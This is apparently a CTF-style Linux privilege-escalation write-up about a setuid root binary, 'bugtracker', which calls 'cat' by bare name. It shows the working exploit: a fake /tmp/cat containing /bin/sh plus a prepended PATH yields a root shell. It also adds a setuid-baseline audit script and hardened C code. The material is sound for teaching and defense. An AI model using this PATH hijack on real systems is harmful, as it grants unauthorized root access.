The SUID (Set User ID) permission causes a file to execute with the privileges of the file's owner, regardless of the user running it. If the owner lacks execute permission, the bit is displayed as an uppercase "S" instead of a lowercase "s". If a binary is owned by root and has the SUID bit set, it executes with root privileges even when run by a non-root user.
victim@target:~$ sudo -l
* lists the commands the current user is allowed to run with sudo on this system.
victim@target:~$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
victim@target:~$ find / -group {groupName} 2>/dev/null
/usr/bin/bugtracker
* searches the filesystem for files owned by the specified group (here the bugtracker group seen in the id output); errors from unreadable directories are discarded with 2>/dev/null.
# check the file's permissions and type
victim@target:~$ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
* the "s" in the user execute position (rws) indicates that the file has the
setuid permission set. this means that when this binary is executed, it will run
with the permissions of the file's owner (in this case, root), not the user who
ran it.
- if a non-root user runs /usr/bin/bugtracker, the program will execute as the
root user (because root is the owner of the file), giving the user elevated
privileges.
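The same enumeration is what a defender should run on a schedule: inventory every setuid file (find -perm -4000 rather than a single group lookup), record owner, group and mode, and diff against a saved baseline so a newly planted or newly chmod'ed binary such as a group-executable root-owned helper stands out. The script below is an added audit example, not something from the writeup; it uses only POSIX find, ls, sort and comm, and the directory argument and baseline file name are whatever you choose.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): inventory setuid files and
# compare them against a saved baseline so new entries are reported.

# Print "owner group mode path" for every setuid regular file under $1
# (defaults to /). -xdev keeps the scan on one filesystem.
list_setuid() {
    root="${1:-/}"
    find "$root" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r f; do
        # ls -ld fields: mode links owner group size date... name
        set -- $(ls -ld "$f")
        printf '%s %s %s %s\n' "$3" "$4" "$1" "$f"
    done
}

# Print setuid files under $2 that do not appear in baseline file $1
# (a file previously written by list_setuid). Returns 1 when at least
# one new entry exists, 0 when the tree matches the baseline.
setuid_new_since() {
    baseline="$1"; root="${2:-/}"
    cur=$(mktemp); new=$(mktemp)
    list_setuid "$root" | sort > "$cur"
    sort "$baseline" | comm -13 - "$cur" > "$new"   # lines only in current
    cat "$new"
    rc=0
    [ -s "$new" ] && rc=1
    rm -f "$cur" "$new"
    return $rc
}
```

Typical use is `list_setuid / > /var/lib/suid-baseline.txt` once on a known-good host, then `setuid_new_since /var/lib/suid-baseline.txt /` from cron; a non-zero exit (and the printed lines) is the alert. A root-owned file with mode -rwsr-xr-- and a non-root group, like the one above, is exactly the kind of entry worth reviewing by hand.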
victim@target:~$ /usr/bin/bugtracker
...
victim@target:~$ touch /tmp/cat
victim@target:~$ echo "/bin/sh" > /tmp/cat
victim@target:~$ cat /tmp/cat
/bin/sh
victim@target:~$ chmod +x /tmp/cat
victim@target:~$ export PATH=/tmp:$PATH
* this prepends /tmp to PATH, so a program called by the bare name cat is now resolved to /tmp/cat before /bin/cat
victim@target:~$ bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
10
---------------
# whoami
root
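The root cause is that the setuid binary invokes an external command by its bare name and inherits the caller's environment, so the caller's PATH decides which "cat" runs as root. The C below is an added example of the hardened pattern, not the real bugtracker source (which the writeup does not show): the helper is started with an absolute path via fork and execve, with a fixed minimal environment instead of the inherited one, and the bug ID is validated as digits only before it is used to build a file name. REPORT_DIR and the ".txt" naming are assumptions for the example.

```c
/* Hardened pattern for a setuid program that must run an external tool.
 * Added example; not the page's /usr/bin/bugtracker. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define REPORT_DIR "/root/reports/"   /* hypothetical report location */
#define CAT_PATH   "/bin/cat"         /* absolute path: never found via PATH */

/* Accept only short, all-digit bug IDs, so the value can carry neither
 * shell metacharacters nor path components such as "../". */
int is_valid_bug_id(const char *id) {
    size_t n = strlen(id);
    if (n == 0 || n > 8) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)id[i])) return 0;
    return 1;
}

/* Build REPORT_DIR + id + ".txt" into out. Returns 0 on success,
 * -1 on an invalid id or a buffer that is too small. */
int build_report_path(const char *id, char *out, size_t outlen) {
    if (!is_valid_bug_id(id)) return -1;
    int w = snprintf(out, outlen, "%s%s.txt", REPORT_DIR, id);
    if (w < 0 || (size_t)w >= outlen) return -1;
    return 0;
}

/* Run CAT_PATH on the report with a fixed, minimal environment.
 * fork + execve means no shell is involved and the caller's PATH,
 * IFS or other variables cannot influence which binary executes.
 * Returns the child's exit status, or -1 on validation/exec failure. */
int show_report(const char *id) {
    char path[256];
    if (build_report_path(id, path, sizeof path) != 0) return -1;

    char *const argv[] = { "cat", "--", path, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(CAT_PATH, argv, envp);
        _exit(127);                    /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char buf[32];
    printf("Provide Bug ID: ");
    fflush(stdout);
    if (!fgets(buf, sizeof buf, stdin)) return 1;
    buf[strcspn(buf, "\n")] = '\0';
    if (!is_valid_bug_id(buf)) {
        fprintf(stderr, "invalid bug id\n");
        return 1;
    }
    return show_report(buf);
}
```

Two further mitigations, independent of the code, are cheap to apply to a binary like this: install it without the setuid bit and give it the capability or group membership it actually needs, and keep it only group-executable by a group whose membership is reviewed, since the ls output above shows that the bugtracker group was the only thing standing between any local user and root.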